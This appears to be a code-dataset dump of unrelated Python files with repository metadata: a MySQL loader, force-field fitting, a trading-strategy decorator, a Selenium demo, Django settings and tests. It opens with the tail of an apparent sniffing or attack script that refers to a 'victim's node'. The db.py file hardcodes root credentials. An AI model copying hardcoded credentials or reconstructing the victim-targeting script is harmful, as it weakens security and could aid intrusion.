print('Connection was refused. The victim\'s node must not be running.')
print(f'Successful connections: {len(identity_address)}\n')
# Prevent the script from terminating when the sniff function is still active
while 1:
time.sleep(60)
| 34.497006
| 359
| 0.743881
| 1,684
| 11,522
| 4.9519
| 0.226247
| 0.04461
| 0.064756
| 0.083463
| 0.222449
| 0.153016
| 0.144142
| 0.131071
| 0.093896
| 0.093896
| 0
| 0.03019
| 0.137563
| 11,522
| 333
| 360
| 34.600601
| 0.808997
| 0.24553
| 0
| 0.118421
| 0
| 0.026316
| 0.278183
| 0.051906
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065789
| false
| 0.013158
| 0.078947
| 0.008772
| 0.175439
| 0.122807
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5c39c5c86dfe51c79bcbc35385263a0ba508a1
| 1,638
|
py
|
Python
|
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
spider/db.py
|
aloneZERO/douban-movie-visualization
|
8e59c4d0b00df1b240a5dce09093ae4984fd7118
|
[
"WTFPL"
] | null | null | null |
#!python3
'''
数据库操作类
author: justZero
email: alonezero@foxmail.com
date: 2017-8-6
'''
import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint
class MySQLdb(object):
def __init__(self):
self.conn = pymysql.connect(
host='localhost',
user='root',
passwd='root',
db='douban_movie',
port=8889,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor)
self.conn.autocommit(True)
self.cursor = self.conn.cursor()
def close(self):
self.conn.close()
self.cursor.close()
# 批量插入
def __insert_many(self, sql, params):
self.cursor.executemany(sql, params)
# 电影数据插入
def insert_movie(self, params):
sql = 'insert into movie(movieId,title,url,cover,rate,director,composer,actor,category,district,language,showtime,length,othername,description) '+ \
'values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)'
self.__insert_many(sql, params)
# 统计数据插入
def insert_rate(self, params):
sql = 'insert into rate(name,category,rate) values(%s,%s,%s)'
self.__insert_many(sql, params)
if __name__ == '__main__':
inputFile = 'data/douban_movie_clean.txt'
movies_df = pd.read_csv(inputFile, sep='^')
movies = np.array(movies_df).tolist()
db = MySQLdb()
try:
db.insert_movie(movies)
except Exception as e:
raise e
finally:
db.close()
| 25.2
| 156
| 0.566545
| 192
| 1,638
| 4.677083
| 0.489583
| 0.035635
| 0.046771
| 0.053452
| 0.122494
| 0.071269
| 0.071269
| 0.071269
| 0.016704
| 0.016704
| 0
| 0.010563
| 0.306471
| 1,638
| 64
| 157
| 25.59375
| 0.77993
| 0.058608
| 0
| 0.04878
| 0
| 0.04878
| 0.203135
| 0.148269
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121951
| false
| 0.02439
| 0.146341
| 0
| 0.292683
| 0.02439
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5d1777ffd1452788619a58c2a3c09a88985225
| 2,077
|
py
|
Python
|
examples/rxff-serial/run.py
|
sctiwari/EZFF_ASE
|
94710d4cf778ff2db5e6df0cd6d10d92e1b98afe
|
[
"MIT"
] | 3
|
2019-01-22T21:22:09.000Z
|
2019-04-02T22:50:40.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 14
|
2019-01-14T18:33:15.000Z
|
2019-07-08T22:10:11.000Z
|
examples/rxff-serial/run.py
|
ElsevierSoftwareX/SOFTX-D-20-00066
|
b43f8bbb1321d7ed3eeec4f8bb894fe431779433
|
[
"MIT"
] | 3
|
2019-03-24T23:43:13.000Z
|
2021-09-12T13:45:08.000Z
|
import ezff
from ezff.interfaces import gulp, qchem
# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')
def my_error_function(rr):
# Get a unique path for GULP jobs from the MPI rank. Set to '0' for serial jobs
try:
path = str(pool.rank)
except:
path = '0'
# Calculate Ground State
md_gs_job = gulp.job(path = path)
md_gs_job.structure = gt_gs
md_gs_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_gs_job.options['pbc'] = False
md_gs_job.options['relax_atoms'] = False
md_gs_job.options['relax_cell'] = False
# Run GULP calculation
md_gs_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_gs_energy = md_gs_job.read_energy()
md_gs_job.cleanup()
# Calculate PES Scan
md_scan_job = gulp.job(path = path)
md_scan_job.structure = gt_scan
md_scan_job.forcefield = ezff.generate_forcefield(template, rr, FFtype = 'reaxff')
md_scan_job.options['pbc'] = False
md_scan_job.options['relax_atoms'] = False
md_scan_job.options['relax_cell'] = False
# Run GULP calculation
md_scan_job.run(command='gulp')
# Read output from completed GULP job and clean-up
md_scan_energy = md_scan_job.read_energy()
md_scan_job.cleanup()
# Calculate error
total_error = ezff.error_energy( md_scan_energy-md_gs_energy, gt_scan_energy-gt_gs_energy, weights = 'uniform')
return [total_error]
# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')
problem = ezff.OptProblem(num_errors = 1, variable_bounds = bounds, error_function = my_error_function, template = template)
algorithm = ezff.Algorithm(problem, 'NSGAII', population = 16)
ezff.optimize(problem, algorithm, iterations = 5)
| 37.763636
| 124
| 0.735676
| 306
| 2,077
| 4.70915
| 0.277778
| 0.030534
| 0.04372
| 0.029146
| 0.431645
| 0.353921
| 0.224844
| 0.224844
| 0.224844
| 0.163775
| 0
| 0.003452
| 0.163216
| 2,077
| 54
| 125
| 38.462963
| 0.825662
| 0.158883
| 0
| 0
| 0
| 0
| 0.121544
| 0.06106
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0.055556
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5db4db71b2cfe512dcdca6c87e641cb929544e
| 2,288
|
py
|
Python
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | 1
|
2022-01-29T17:14:40.000Z
|
2022-01-29T17:14:40.000Z
|
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
dev_files/utils.py
|
dylanwal/unit_parse
|
07a74d43b9f161bd7ad6ef12ab0f362f1bf6a90d
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from testing_func import testing_func, test_logger
from unit_parse import logger, Unit, Q
from unit_parse.utils import *
test_logger.setLevel(logging.DEBUG)
logger.setLevel(logging.DEBUG)
test_split_list = [
# positive control (changes)
[["fish","pig", "cow"], ["f", "is", "h", "pig", "cow"], {"chunks": ["is"]}],
[["fish", Unit("g"), "cow"], ["f", "is", "h", Unit("g"), "cow"], {"chunks": ["is"]}],
[["fishpigcow"], ["f", "i", "shpigcow"], {"chunks": ["i"]}],
[["fishpigcow"], ["f", "i", "shpig", "c", "ow"], {"chunks": ["i", "c"]}],
# negative control (no changes)
[["fish"], ["fish"], {"chunks": ["fish"]}],
[["fishpigcow"], ["fishpigcow"], {"chunks": ["z"]}],
[[Unit("g")], [Unit("g")], {"chunks": ["is"]}],
]
testing_func(split_list, test_split_list)
test_round_off = [ # [Input, Output]
# positive control (works)
[234.2342300000001, 234.23423, {"sig_digit": 15}],
[234.2342399999999999, 234.23424, {"sig_digit": 15}],
[234.2342300000001, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 234.23, {"sig_digit": 5}],
[234.2342399999999999, 200, {"sig_digit": 1}],
[-234.2342399999999999, -200, {"sig_digit": 1}],
[-234.2342399999999999, -234.23424, {"sig_digit": 15}],
# negative control (fails)
]
testing_func(sig_figs, test_round_off)
test_list_depth = [ # [Input, Output]
# positive control (works)
["", 0],
[[], 0],
["asds", 0],
[1, 0],
[["aaa"], 1],
[[["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[["aaa", "aaa", "aaa"], ["aaa"], ["aaa"]], 2],
[[[["aaa"], ["aaa"], ["aaa"]]], 3],
# negative control (fails)
]
testing_func(get_list_depth, test_list_depth)
test_remove_empty_cells = [ # [Input, Output]
# positive control (works)
[[], None],
[[""], None],
[["asds"], ["asds"]],
[1, 1],
[["aaa", ""], ["aaa"]],
[["aaa", []], ["aaa"]],
[[["aaa", []]], [["aaa"]]],
[[["aaa", [""]]], [["aaa"]]],
# negative control (fails)
]
testing_func(remove_empty_cells, test_remove_empty_cells)
examples_quantity_difference = [
[Q("5 g"), Q("0.5"), {"quantity2": Q("10 g")}],
[5, 1, {"quantity2": Q("10 g")}],
]
testing_func(quantity_difference, examples_quantity_difference)
| 27.566265
| 89
| 0.542832
| 270
| 2,288
| 4.425926
| 0.259259
| 0.085356
| 0.097908
| 0.090377
| 0.366527
| 0.210879
| 0.210879
| 0.105439
| 0.037657
| 0.037657
| 0
| 0.106553
| 0.179633
| 2,288
| 82
| 90
| 27.902439
| 0.530101
| 0.111014
| 0
| 0.037037
| 0
| 0
| 0.167244
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.074074
| 0
| 0.074074
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5f21108bc3014442b8b88f1279054fc89706f5
| 5,302
|
py
|
Python
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1
|
2022-03-06T22:44:30.000Z
|
2022-03-06T22:44:30.000Z
|
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | null | null | null |
freqtrade/strategy/informative_decorator.py
|
Fractate/freqbot
|
47b35d2320dc97977411454c1466c762d339fdee
|
[
"MIT"
] | 1
|
2021-09-22T23:28:21.000Z
|
2021-09-22T23:28:21.000Z
|
from typing import Any, Callable, NamedTuple, Optional, Union
from pandas import DataFrame
from freqtrade.exceptions import OperationalException
from freqtrade.strategy.strategy_helper import merge_informative_pair
PopulateIndicators = Callable[[Any, DataFrame, dict], DataFrame]
class InformativeData(NamedTuple):
asset: Optional[str]
timeframe: str
fmt: Union[str, Callable[[Any], str], None]
ffill: bool
def informative(timeframe: str, asset: str = '',
fmt: Optional[Union[str, Callable[[Any], str]]] = None,
ffill: bool = True) -> Callable[[PopulateIndicators], PopulateIndicators]:
"""
A decorator for populate_indicators_Nn(self, dataframe, metadata), allowing these functions to
define informative indicators.
Example usage:
@informative('1h')
def populate_indicators_1h(self, dataframe: DataFrame, metadata: dict) -> DataFrame:
dataframe['rsi'] = ta.RSI(dataframe, timeperiod=14)
return dataframe
:param timeframe: Informative timeframe. Must always be equal or higher than strategy timeframe.
:param asset: Informative asset, for example BTC, BTC/USDT, ETH/BTC. Do not specify to use
current pair.
:param fmt: Column format (str) or column formatter (callable(name, asset, timeframe)). When not
specified, defaults to:
* {base}_{quote}_{column}_{timeframe} if asset is specified.
* {column}_{timeframe} if asset is not specified.
Format string supports these format variables:
* {asset} - full name of the asset, for example 'BTC/USDT'.
* {base} - base currency in lower case, for example 'eth'.
* {BASE} - same as {base}, except in upper case.
* {quote} - quote currency in lower case, for example 'usdt'.
* {QUOTE} - same as {quote}, except in upper case.
* {column} - name of dataframe column.
* {timeframe} - timeframe of informative dataframe.
:param ffill: ffill dataframe after merging informative pair.
"""
_asset = asset
_timeframe = timeframe
_fmt = fmt
_ffill = ffill
def decorator(fn: PopulateIndicators):
informative_pairs = getattr(fn, '_ft_informative', [])
informative_pairs.append(InformativeData(_asset, _timeframe, _fmt, _ffill))
setattr(fn, '_ft_informative', informative_pairs)
return fn
return decorator
def _format_pair_name(config, pair: str) -> str:
return pair.format(stake_currency=config['stake_currency'],
stake=config['stake_currency']).upper()
def _create_and_merge_informative_pair(strategy, dataframe: DataFrame, metadata: dict,
inf_data: InformativeData,
populate_indicators: PopulateIndicators):
asset = inf_data.asset or ''
timeframe = inf_data.timeframe
fmt = inf_data.fmt
config = strategy.config
if asset:
# Insert stake currency if needed.
asset = _format_pair_name(config, asset)
else:
# Not specifying an asset will define informative dataframe for current pair.
asset = metadata['pair']
if '/' in asset:
base, quote = asset.split('/')
else:
# When futures are supported this may need reevaluation.
# base, quote = asset, ''
raise OperationalException('Not implemented.')
# Default format. This optimizes for the common case: informative pairs using same stake
# currency. When quote currency matches stake currency, column name will omit base currency.
# This allows easily reconfiguring strategy to use different base currency. In a rare case
# where it is desired to keep quote currency in column name at all times user should specify
# fmt='{base}_{quote}_{column}_{timeframe}' format or similar.
if not fmt:
fmt = '{column}_{timeframe}' # Informatives of current pair
if inf_data.asset:
fmt = '{base}_{quote}_' + fmt # Informatives of other pairs
inf_metadata = {'pair': asset, 'timeframe': timeframe}
inf_dataframe = strategy.dp.get_pair_dataframe(asset, timeframe)
inf_dataframe = populate_indicators(strategy, inf_dataframe, inf_metadata)
formatter: Any = None
if callable(fmt):
formatter = fmt # A custom user-specified formatter function.
else:
formatter = fmt.format # A default string formatter.
fmt_args = {
'BASE': base.upper(),
'QUOTE': quote.upper(),
'base': base.lower(),
'quote': quote.lower(),
'asset': asset,
'timeframe': timeframe,
}
inf_dataframe.rename(columns=lambda column: formatter(column=column, **fmt_args),
inplace=True)
date_column = formatter(column='date', **fmt_args)
if date_column in dataframe.columns:
raise OperationalException(f'Duplicate column name {date_column} exists in '
f'dataframe! Ensure column names are unique!')
dataframe = merge_informative_pair(dataframe, inf_dataframe, strategy.timeframe, timeframe,
ffill=inf_data.ffill, append_timeframe=False,
date_column=date_column)
return dataframe
| 41.100775
| 100
| 0.656733
| 597
| 5,302
| 5.708543
| 0.273032
| 0.024648
| 0.017606
| 0.01115
| 0.090376
| 0.037559
| 0.02054
| 0.02054
| 0
| 0
| 0
| 0.001009
| 0.252546
| 5,302
| 128
| 101
| 41.421875
| 0.858945
| 0.375707
| 0
| 0.042254
| 0
| 0
| 0.078898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056338
| false
| 0
| 0.056338
| 0.014085
| 0.239437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c60db4ddf2f272ea38921358d511b5e55303545
| 835
|
py
|
Python
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 234
|
2020-04-03T02:59:30.000Z
|
2022-03-27T15:29:21.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 8
|
2020-04-20T11:20:43.000Z
|
2021-08-18T16:41:15.000Z
|
codigo_das_aulas/aula_09/aula_09_03.py
|
VeirichR/curso-python-selenium
|
9b9107a64adb4e6bcf10c76287e0b4cc7d024321
|
[
"CC0-1.0"
] | 77
|
2020-04-03T13:25:19.000Z
|
2022-02-24T15:31:26.000Z
|
from functools import partial
from selenium.webdriver import Firefox
from selenium.webdriver.support.ui import (
WebDriverWait
)
def esperar_elemento(elemento, webdriver):
print(f'Tentando encontrar "{elemento}"')
if webdriver.find_elements_by_css_selector(elemento):
return True
return False
esperar_botao = partial(esperar_elemento, 'button')
esperar_sucesso = partial(esperar_elemento, '#finished')
url = 'https://selenium.dunossauro.live/aula_09_a.html'
driver = Firefox()
wdw = WebDriverWait(driver, 10)
driver.get(url)
wdw.until(esperar_botao, 'Deu ruim')
driver.find_element_by_css_selector('button').click()
wdw.until(
esperar_sucesso,
'A mensagem de sucesso não apareceu'
)
sucesso = driver.find_element_by_css_selector('#finished')
assert sucesso.text == 'Carregamento concluído'
| 21.973684
| 58
| 0.762874
| 105
| 835
| 5.866667
| 0.52381
| 0.073052
| 0.063312
| 0.061688
| 0.097403
| 0.097403
| 0
| 0
| 0
| 0
| 0
| 0.005525
| 0.132934
| 835
| 37
| 59
| 22.567568
| 0.845304
| 0
| 0
| 0
| 0
| 0
| 0.205988
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 1
| 0.041667
| false
| 0
| 0.125
| 0
| 0.25
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6108b6c6b2c6296484cdaaf51540f0a9efca44
| 1,470
|
py
|
Python
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 24
|
2020-06-30T11:43:38.000Z
|
2021-11-15T22:58:47.000Z
|
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | null | null | null |
prae/losses.py
|
irom-lab/RL_Generalization
|
82add6898ee2e962a3aa5efedf80821a013eae7f
|
[
"MIT"
] | 4
|
2020-10-15T10:54:18.000Z
|
2021-05-25T07:38:14.000Z
|
import torch
from torch import nn
from prae.distances import square_dist, HingedSquaredEuclidean
class Loss(nn.Module):
"""
"""
def __init__(self, hinge, neg=True, rew=True):
"""
"""
super().__init__()
self.reward_loss = square_dist
# If False, no negative sampling
self.neg = neg
# If False, no reward loss
self.rew = rew
self.distance = HingedSquaredEuclidean(eps=hinge)
def forward(self, z_c, z_l, z_n, z_f, r, r_e):
"""
"""
# Transition loss
transition_loss = self.distance.distance(z_n, z_l).mean()
# Reward loss
if self.rew:
reward_loss = 0.5 * self.reward_loss(r, r_e).mean()
else:
reward_loss = torch.zeros_like(transition_loss)
# Negative los
if self.neg:
z_n = tile(z_n, z_f)
batch_size = z_c.shape[0]
negative_loss = self.distance.negative_distance(z_n, z_f).sum()/batch_size
else:
negative_loss = torch.zeros_like(transition_loss)
return transition_loss, reward_loss, negative_loss
def tile(embedding, example):
"""
"""
n = example.shape[0]//embedding.shape[0]
embedding = embedding.unsqueeze(1).repeat(1, n, 1)
embedding = squeeze_embedding(embedding)
return embedding
def squeeze_embedding(x):
"""
"""
b, n, d = x.shape
x = x.reshape(b*n, d)
return x
| 24.098361
| 86
| 0.586395
| 191
| 1,470
| 4.287958
| 0.314136
| 0.08547
| 0.014652
| 0.014652
| 0.078144
| 0.078144
| 0
| 0
| 0
| 0
| 0
| 0.007775
| 0.3
| 1,470
| 60
| 87
| 24.5
| 0.788144
| 0.065306
| 0
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0
| 0.09375
| 0
| 0.34375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c6289a028d756ccd03ac220d11a9d33117ee573
| 6,530
|
py
|
Python
|
djcorsche/settings_default.py
|
carthage-college/django-djcorsche
|
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
|
[
"BSD-3-Clause"
] | null | null | null |
djcorsche/settings_default.py
|
carthage-college/django-djcorsche
|
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
|
[
"BSD-3-Clause"
] | null | null | null |
djcorsche/settings_default.py
|
carthage-college/django-djcorsche
|
c43db6e634f5b3fc9c8b0cff80ced8382ca6643c
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Django settings for project.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
# Debug
#DEBUG = False
DEBUG = True
TEMPLATE_DEBUG = DEBUG
INFORMIX_DEBUG = "debug"
ADMINS = (
('', ''),
)
MANAGERS = ADMINS
SECRET_KEY = ''
ALLOWED_HOSTS = []
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'America/Chicago'
SITE_ID = 1
USE_I18N = False
USE_L10N = False
USE_TZ = False
DEFAULT_CHARSET = 'utf-8'
FILE_CHARSET = 'utf-8'
SERVER_URL = ""
API_URL = "%s/%s" % (SERVER_URL, "api")
LIVEWHALE_API_URL = "https://%s" % (SERVER_URL)
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
ROOT_DIR = os.path.dirname(__file__)
ROOT_URL = "/djskeletor/"
ROOT_URLCONF = 'djskeletor.core.urls'
WSGI_APPLICATION = 'djskeletor.wsgi.application'
MEDIA_ROOT = ''
ADMIN_MEDIA_PREFIX = '/static/admin/'
STATIC_ROOT = ''
STATIC_URL = "/static/"
STATICFILES_DIRS = ()
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
DATABASES = {
'default': {
'HOST': '127.0.0.1',
'PORT': '3306',
'NAME': 'django_djskeletor',
'ENGINE': 'django.db.backends.mysql',
#'ENGINE': 'django.db.backends.dummy',
'USER': '',
'PASSWORD': ''
},
}
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.formtools',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.staticfiles',
'djskeletor',
'djskeletor.core',
'djskeletor.myapp',
'djtools',
)
MIDDLEWARE_CLASSES = (
'django.middleware.cache.UpdateCacheMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.cache.FetchFromCacheMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# the following should be uncommented unless you are
# embedding your apps in iframes
#'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# template stuff
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
"/data2/django_projects/djskeletor/templates/",
"/data2/django_templates/djkorra/",
"/data2/django_templates/djcher/",
"/data2/django_templates/",
)
TEMPLATE_CONTEXT_PROCESSORS = (
"djtools.context_processors.sitevars",
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.media",
)
# caching
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
#'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#'LOCATION': '127.0.0.1:11211',
#'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
#'LOCATION': '/var/tmp/django_djskeletor_cache',
#'TIMEOUT': 60*20,
#'KEY_PREFIX': "DJSKELETOR_",
#'OPTIONS': {
# 'MAX_ENTRIES': 80000,
#}
}
}
CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
# LDAP Constants
LDAP_SERVER = ''
LDAP_SERVER_PWM = ''
LDAP_PORT = ''
LDAP_PORT_PWM = ''
LDAP_PROTOCOL = ""
LDAP_PROTOCOL_PWM = ""
LDAP_BASE = ""
LDAP_USER = ""
LDAP_PASS = ""
LDAP_EMAIL_DOMAIN = ""
LDAP_OBJECT_CLASS = ""
LDAP_OBJECT_CLASS_LIST = []
LDAP_GROUPS = {}
LDAP_RETURN = []
LDAP_RETURN_PWM = []
LDAP_ID_ATTR = ""
LDAP_CHALLENGE_ATTR = ""
# auth backends
AUTHENTICATION_BACKENDS = (
'djauth.ldapBackend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_URL = '/djskeletor/accounts/login/'
LOGIN_REDIRECT_URL = '/djskeletor/'
USE_X_FORWARDED_HOST = True
#SESSION_ENGINE = "django.contrib.sessions.backends.cache"
SESSION_EXPIRE_AT_BROWSER_CLOSE = False
SESSION_COOKIE_DOMAIN=".carthage.edu"
SESSION_COOKIE_NAME ='django_djskeletor_cookie'
SESSION_COOKIE_AGE = 86400
# SMTP settings
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_FAIL_SILENTLY = False
DEFAULT_FROM_EMAIL = ''
SERVER_EMAIL = ''
SERVER_MAIL=''
# logging
LOG_FILEPATH = os.path.join(os.path.dirname(__file__), "logs/")
LOG_FILENAME = LOG_FILEPATH + "debug.log"
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'standard': {
'format' : "[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s",
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s',
'datefmt' : "%Y/%b/%d %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level':'DEBUG',
'class':'django.utils.log.NullHandler',
},
'logfile': {
'level':'DEBUG',
'class':'logging.handlers.RotatingFileHandler',
'filename': LOG_FILENAME,
'maxBytes': 50000,
'backupCount': 2,
'formatter': 'standard',
},
'console':{
'level':'INFO',
'class':'logging.StreamHandler',
'formatter': 'standard'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'include_html': True,
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'djskeletor': {
'handlers':['logfile'],
'propagate': True,
'level':'DEBUG',
},
'django': {
'handlers':['console'],
'propagate': True,
'level':'WARN',
},
'django.db.backends': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| 27.552743
| 96
| 0.620214
| 653
| 6,530
| 5.984686
| 0.381317
| 0.059877
| 0.013306
| 0.01305
| 0.07216
| 0.038383
| 0.010747
| 0.010747
| 0.010747
| 0
| 0
| 0.011021
| 0.221899
| 6,530
| 236
| 97
| 27.669492
| 0.758118
| 0.118989
| 0
| 0.084577
| 0
| 0.00995
| 0.426075
| 0.252884
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.014925
| 0.004975
| 0
| 0.004975
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c63d036bfd0e51ade860a3521aecee117e88f7d
| 7,064
|
py
|
Python
|
tests/test_users.py
|
fastapi-users/fastapi-users-db-sqlmodel
|
3a46b80399f129aa07a834a1b40bf49d08c37be1
|
[
"MIT"
] | 18
|
2021-09-09T09:35:30.000Z
|
2022-03-19T04:58:17.000Z
|
tests/test_users.py
|
fastapi-users/fastapi-users-db-sqlmodel
|
3a46b80399f129aa07a834a1b40bf49d08c37be1
|
[
"MIT"
] | null | null | null |
tests/test_users.py
|
fastapi-users/fastapi-users-db-sqlmodel
|
3a46b80399f129aa07a834a1b40bf49d08c37be1
|
[
"MIT"
] | 3
|
2021-11-01T16:58:54.000Z
|
2022-02-15T16:17:11.000Z
|
import uuid
from typing import AsyncGenerator
import pytest
from sqlalchemy import exc
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.orm import sessionmaker
from sqlmodel import Session, SQLModel, create_engine
from fastapi_users_db_sqlmodel import (
NotSetOAuthAccountTableError,
SQLModelUserDatabase,
SQLModelUserDatabaseAsync,
)
from tests.conftest import OAuthAccount, UserDB, UserDBOAuth
